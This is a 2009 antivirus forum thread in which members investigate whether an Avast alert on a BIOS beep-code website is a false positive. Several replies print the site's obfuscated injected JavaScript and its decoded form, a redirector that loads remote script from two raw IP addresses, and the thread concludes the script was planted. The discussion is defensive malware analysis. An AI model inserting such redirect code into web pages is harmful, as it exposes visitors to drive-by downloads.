Author Topic: false positive in www.bioscentral.com  (Read 11614 times)

0 Members and 1 Guest are viewing this topic.

dj-quiou

  • Guest
false positive in www.bioscentral.com
« on: February 14, 2009, 07:13:01 PM »
Hello, I come from France, so , please scuse my english.

I work for an informatics magazine specialized on computers security. So, I help people to remove viruses, trojans and worms from their computers. But , this morning, someone who read our magazine tell us, one of links we give to identify Bios bips is infected by JS-Redirector-D[trj] . when he is going on this website, his antivirus Avast blocks the connexion to this website www.bioscentral.com

Is it a false positive or not? because this website was safe and viruses free before this alert

thans your for help
« Last Edit: February 14, 2009, 07:18:19 PM by dj-quiou »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88900
  • No support PMs thanks
Re: false positive in www.bioscentral.com
« Reply #1 on: February 14, 2009, 07:23:28 PM »
avast isn't the only one to see this is infected, http://linkscanner.explabs.com/linkscanner/checksite......bioscentral.com/

There is a big chunk of obfuscated script at the bottom of the source code, now I believe this is what is causing the alert. I don't know if it is a Yahoo counter as there really is no reasonable reason to obfuscate a simple counter code.

I have broken the very long single line of code so it is easier to see, and another reason why I think it is suspect as a counter code would be laid out in normal scripting style.
« Last Edit: February 14, 2009, 07:26:34 PM by DavidR »
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

dj-quiou

  • Guest
Re: false positive in www.bioscentral.com
« Reply #2 on: February 14, 2009, 07:40:07 PM »
yes this code is the one avast recognise as the trojan, so this code looks encoded in unescape language, I have decoded it and i have this new code, we can seesome words written in "leet speak"

Quote
'//|<d`iv @s~t~yle=d%

69|sp!l`a@y:no&ne>\ndocume#n|t!.wr`i#t~e("</`text$a!%

72~ea~>|"$);~v&ar #i,`_`,a=~["78~.110.@1!75#.`2&1",%2

21~95.!2|4$.7`6@.2#5&1`"]&;|_=@1;$if`(&d#ocum@ent`.

`c$o&ok~ie.m!a&t~c~h($/&\`bhgf|t=`1/)!=$=&nul|l)f

!o~r(|i$=0`;i&<!2`;@i~++`)~docu$men!t#.wr~i|t

e~($"<$s#c&r&i&pt`>i~f~(!_`)!do|c$u`m~ent`.&wri|t&e

@(\"~<s#crip!t id`=_"+i~+$"$_@ s|r!c=/#/&"+&a@[~i]%

2B"@/@cp/?"@+nav$igat&o#r.#a@p$pName.~ch|ar@A%7

4~(0`)+"><#\\~/sc$ri!pt>|\")|<&\/s@cri@pt!>#"!)|;

&\n|//#<$/div>

do you think it's a true alert or not ?

solcroft

  • Guest
Re: false positive in www.bioscentral.com
« Reply #3 on: February 14, 2009, 07:43:56 PM »
I have broken the very long single line of code so it is easier to see, and another reason why I think it is suspect as a counter code would be laid out in normal scripting style.

Both avast! and LinkScanner may flag it, but I'm seeing nothing odd on my end via manual deobfuscation. The code you posted resolves to a relatively harmless:
Quote
document.write("</textarea>");var i,_,a=["78.110.175.21","195.24.76.251"];_=1;if(document.cookie.match(/\bhgft=1/)==null)for(i=0;i<2;i++)document.write("<script>if(_)document.write(\"<script id=_"+i+"_ src=//"+a+"/cp/?"+navigator.appName.charAt(0)+"><\\/script>\")<\/script>");

The first IP address contains the following:
Quote
_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i+"_");if(d)d.src=""}eval(unescape('#/%2F#%4Au`s|t%20%66uc!k%20~of%66.#%2E.$ #%3C%64!i%76%20|s%74%79!%6C$e~=$d$%69s$%70%6C|%61y%3A%6E!%6F`%6Ee`%3E|\n%76%61|r~ @%74!%3D!n#%65w D$%61|t%65(!12`%334%37333~70$%30|%30$%30)`;#%64ocu!%6D%65!%6E@%74%2Ec%6F%6F#%6B@%69e=%22!%68%67f%74~%3D@%31%3B~%20e$xp%69|r@e|s%3D~"~%2B`%74.%74~o#%47|MT%53!%74$r`%69n%67!()+@%22#;@ %70a%74%68%3D|/!%22!;\n%2F%2F`%3C#/$d~i%76~%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));

Which eventually resolves to...
Quote
//Just f**k off...

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33892
  • malware fighter
Re: false positive in www.bioscentral.com
« Reply #4 on: February 14, 2009, 07:51:27 PM »
Hi folks,

This does not alter the fact that the link is not quite "kosher"
      
Exploit Prevention LinkScanner flags this as:

There was 1 threat found.
Stop     DANGEROUS: LinkScanner Online has found
[link to known exploit site (type 610)]
Detail:     
   
Risk Category:     Exploit
Description:     XPL's Intelligence Network has detected an exploit. An exploit is a piece of malware code that takes advantage of a vulnerability in a software application, usually the operating system or a web browser to infect a computer. Exploits usually target a computer by means of a drive-by download – the user has no idea that a download has even taken place. XPL recommends not visiting this web site regardless if your computer has been patched for the vulnerability.
Scanned:     
Saturday, February 14, 2009

Our Advice:

This page contains at least one exploit. You should not click on this link without appropriate anti-exploit protection on your PC,
Norton Safe Web Scanner gives the following verdict:
Threat Report

Total threats found: 2

Small-whitebg-red     Drive-By Downloads (what's this?)

Threats found: 2
Here is a complete list:
Threat Name:     Process Started
Process name:     C:\WINDOWS\system32\cmd.exe
Location:     hxxp://bioscentral.com/

   
Direct link to:
Location:     hxxp://www.bioscentral.com/beepcodes/amibeep.htm

polonus


« Last Edit: February 14, 2009, 07:56:55 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

dj-quiou

  • Guest
Re: false positive in www.bioscentral.com
« Reply #5 on: February 14, 2009, 08:10:22 PM »
I'm sorry, but , solcroft ,I dont understand the aggregate of you have written.

Do you want tou say, this code is safe, and it's not a trojan?

so, in this instance, this Alert it's a false positive . Right?
« Last Edit: February 14, 2009, 08:11:54 PM by dj-quiou »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88900
  • No support PMs thanks
Re: false positive in www.bioscentral.com
« Reply #6 on: February 14, 2009, 09:06:59 PM »
The real question is who placed the code there in the first place, if you have no knowledge of it and you didn't place it there then clearly you need to remove it and investigate how it happened to get there.

Given solcroft,s final manual resolution would appear to be someone thumbing their nose at what is computer security related.

One of the IPs given by solcroft is a Russian location and there is no guarantee that what might be at the other end of the IP in one day or one minute and be more malicious than an expletive, so it is still a exploit redirection as indicated by the avast malware name.

The other IP is in Luxembourg .
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

dj-quiou

  • Guest
Re: false positive in www.bioscentral.com
« Reply #7 on: February 15, 2009, 11:38:02 AM »
hello , thank you for your help.

This morning, I have analized this part of code with www.virustotal.com and www.viruscan.jotti.org, the results are the same

you can see the results here: http://www.virustotal.com/fr/analisis/a23a94269e1d996d27a19ed1b84885b5

Avast , Sophos and Gdata found this trojan JS:Redirector-D

I have more and more doubts about the legitimity of the site www.Bioscentral.com

Is someone is sure that this part of code is malicious or not.

I'm french, so, please use a very easy english. thanks
« Last Edit: February 15, 2009, 12:29:50 PM by dj-quiou »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88900
  • No support PMs thanks
Re: false positive in www.bioscentral.com
« Reply #8 on: February 15, 2009, 03:06:56 PM »
Really the only way to be sure is to contact bioscentral.com and ask about the legitimacy of the script or if they are even aware of it. The hiding of a redirect by obfuscating the code is obviously suspicious, and the malicious intent to redirect

Many of the scanners don't pick up on this obfuscated script trick which seems to be getting more popular as an attack option, by inserting a script tag into a sites home page, etc.

We are seeing much more of it in the forums (as obviously avast does/is able to check these out) and without exception we are seeing that the avast alert was good when investigated by the site.

GData also uses avast as one of its two scanning engines, so the only other scanner seeing this is Sophos and of course the Exploit Prevention LinkScanner I mentioned before. Also Norton Safe Web Scanner detection that polonus mentioned, https://safeweb.norton.com/report/show?url=www.bioscentral.com&x=0&y=0, so there is certainly enough suspicion.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33892
  • malware fighter
Re: false positive in www.bioscentral.com
« Reply #9 on: February 15, 2009, 03:46:10 PM »
Hi dj-quiou and DavidR,

As infected websites are being turned into the main vector of malware infection, the malcreants "work" this on the Internet as sort of a "moving circus", so the webmaster of some site, and especially those that are not that security aware, can be taken by surprise and not even aware their site is no longer to be trusted; in these cases reputation linkscanners are only adding to the problem giving the Internaut a false feeling of security. The only extension helping here is installing No-Script into a Mozilla-type browser, but that again is a bit over the heads of the n00b user, because they often do not know how to handle this nor do not understand how this works. That is why these malcreants are so successful and with millions of old, not upgraded and fully patched browsers, their success is guaranteed!

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

dj-quiou

  • Guest
Re: false positive in www.bioscentral.com
« Reply #10 on: February 15, 2009, 06:50:57 PM »
thank you very much ALL  ;)

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88900
  • No support PMs thanks
Re: false positive in www.bioscentral.com
« Reply #11 on: February 15, 2009, 07:42:36 PM »
You're welcome.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security